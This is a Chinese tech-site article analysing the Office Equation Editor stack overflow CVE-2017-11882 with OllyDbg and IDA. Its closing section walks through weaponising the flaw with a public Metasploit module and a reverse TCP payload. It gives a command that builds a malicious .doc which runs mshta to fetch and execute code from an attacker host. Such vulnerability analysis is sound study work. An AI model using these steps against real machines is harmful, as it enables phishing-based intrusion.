千家信息网

怎么进行CVE-2017-11882分析

发表于:2025-01-20 作者:千家信息网编辑
千家信息网最后更新 2025年01月20日,怎么进行CVE-2017-11882分析,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。前言其实说到office钓鱼,那就肯定少不了CVE
千家信息网最后更新 2025年01月20日怎么进行CVE-2017-11882分析

怎么进行CVE-2017-11882分析,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。

前言

其实说到office钓鱼,那就肯定少不了CVE-2017-11882,这个漏洞是我去年分析APT组织蔓灵花的样本的时候遇到的,自己也一直没有深入学习和研究这个漏洞,现在有点时间了来分析学习一下,因为此漏洞是很多知名APT组织像蔓灵花、白象、摩诃草、响尾蛇等发起攻击时的开山利器,并且研究此漏洞也不需要by pass DEP和ASLR等保护机制,漏洞利用起来也不算复杂.

漏洞介绍

CVE-2017-11882是微软公布的一个远程代码执行漏洞,漏洞是由模块EQNEDT32.EXE公式编辑器引起,该模块在Office的安装过程中被默认安装,该模块以OLE技术(Object Linking and Embedding,对象链接与嵌入)将公式嵌入在Office文档内。漏洞产生原因是公式编辑器EQNEDT32.EXE(路径C:\Program Files\Common Files\microsoft shared\EQUATION)读入包含MathType的OLE数据,在拷贝公式字体名称时没有对名称长度进行校验,使得攻击者可以通过刻意构造的数据内容覆盖栈上的函数返回地址,造成栈缓冲区溢出,劫持程序执行流程,执行自己的恶意代码,又因为插入和编辑数学公式时,EQNEDT32.EXE并不会被作为Office进程的子进程创建,而是以单独的进程形式存在。所以Office进程的保护机制也无法保护EQNEDT32.EXE这个进程被利用。从漏洞利用效果来看,它可以通杀Office 2003到2016的所有版本。

漏洞分析环境及工具

  1. Win7 x64

  2. Office 2003

  3. IDA

  4. OllyDbg

  5. MSF

漏洞分析

安装office

我使用的是 Office 2003(需要完全安装),我们完全安装后,可以通过下图查看是否都完全安装,菜单-》插入-》对象-》看是否有Microsoft 公式 3.0,如果没有说明安装的不是完整版。
office 2003完整版链接:https://pan.baidu.com/s/1O7BsRE4YQQLvWOWYikGz6Q 提取码:g0dh

查看漏洞文件

我们可以按照以下路径找到产生漏洞的程序,exeinfo信息显示该程序使用VC++编写。

POC验证漏洞

环境搭建好了,我们就可以使用POC来简单验证一下漏洞,打开exploit.rtf可发现没有任何提示直接弹出了计算器,说明验证成功存在漏洞。
弹计算器漏洞POC:https://github.com/Ridter/CVE-2017-11882

详细分析

因为我们打开POC时弹出了计算器,就表明创建了新的进程,创建新进程的API我们可以猜测是WinExec或者CreateProcess。这样我们就可以使用OD附加EQNEDT32.EXE,然后下API断点来进行动态调试。
我们先打开EQNEDT32.EXE然后使用OD附加上此进程。
然后我们下API断点,命令:BP WinExec,然后打开POC文件,程序成功断下,堆栈中显示的内容说明我们断的位置是正确的。
在上图中的堆栈中我们可以看出,WinExec的返回地址是00430C18,参数是0018F354,参数的内容是通过cmd命令来开启计算器。

此时的00430C12是用户态地址,按道理来说,ebp应该存放当前函数的返回地址,但是却显示的是41414141,很明显ebp已经被破坏了,由于此时的堆栈已经被构造的恶意shellcode破坏,所以我们往堆栈上面看看ebp是在哪里被破坏的。

找到了一个最近的返回地址00411837,我们回车进入往上翻,在函数的开头部分设置一个断点,重新运行,让程序断在这个函数内。
程序断下
我们F8单步运行,在00411658的地方发现这样一条指令:rep movsd dword ptr es:[edi], dword ptr [esi]该指令执行完之后,ebp就被41414141覆盖而该指令的功能是将esi的值传送到edi所指的位置。
我们分别查看一下在执行上一条命令之前esi和edi的内容:

ESI:
EDI:
rep movsd dword ptr es:[edi], dword ptr [esi]执行完之后,EDI被成功赋值,可以看到,此时ebp所在的值已经从0018F214变成了41414141,ebp后面的返回地址已经从004115d8更改为了00430c12

00430C12的地址
过来执行WinExec函数之后,在WinExec函数内部又调用了CreateProcess函数。打断点可看到函数的参数,也就是参数为调用cmd弹出计算器

我们通过动态调试已经知道了漏洞产生的位置是在00411658处,我们接下来使用静态分析。我们使用IDA打开EQNEDT32.EXE,然后跳转到00411658地址
为了方便分析我们F5查看以下伪代码,哦~,学过C语言的同学应该一看就明白了,就是我们使用了不安全版的strcpy函数,没有对参数的长度进行判断和限制,从而导致了栈溢出。
POC内容详情
至此,漏洞的大致分析已经完成。

使用MSF利用漏洞

python脚本下载链接:https://github.com/Ridter/CVE-2017-11882


msf组件下载:https://github.com/0x09AL/CVE-2017-11882-metasploit

把上面下载的cve_2017_11882.rb文件复制到/usr/share/metasploit-framework/modules/exploits/windows/smb/目录下

把下载的cve_2017_11882.rtf放到/usr/share/metasploit-framework/data/exploits/

重新加载模块。
使用命令search cve_2017_11882 查找对应的模块,然后use exploit/windows/smb/cve_2017_11882设置payload为反弹tcp,设置各项参数,lhost为kali的IP,使用命令set URIPATH test设置URI的路径(注意这里设置的路径test,下面使用python脚本生成doc的时候也要加上这个路径)
运行,exploit -j

另外打开一个终端,把Command109b_CVE-2017-11882.py复制到kai liunx桌面,cd到桌面,运行命令python Command109b_CVE-2017-11882.py -c "mshta http://192.168.62.129:8080/test" -o test2.doc 生成恶意doc文件
复制文件到目标机打开

返回攻击机kai liunx,看到被攻击机器已经上线

然后就可以进行我们的传统手艺了~~~

看完上述内容,你们掌握怎么进行CVE-2017-11882分析的方法了吗?如果还想学到更多技能或想了解更多相关内容,欢迎关注行业资讯频道,感谢各位的阅读!

0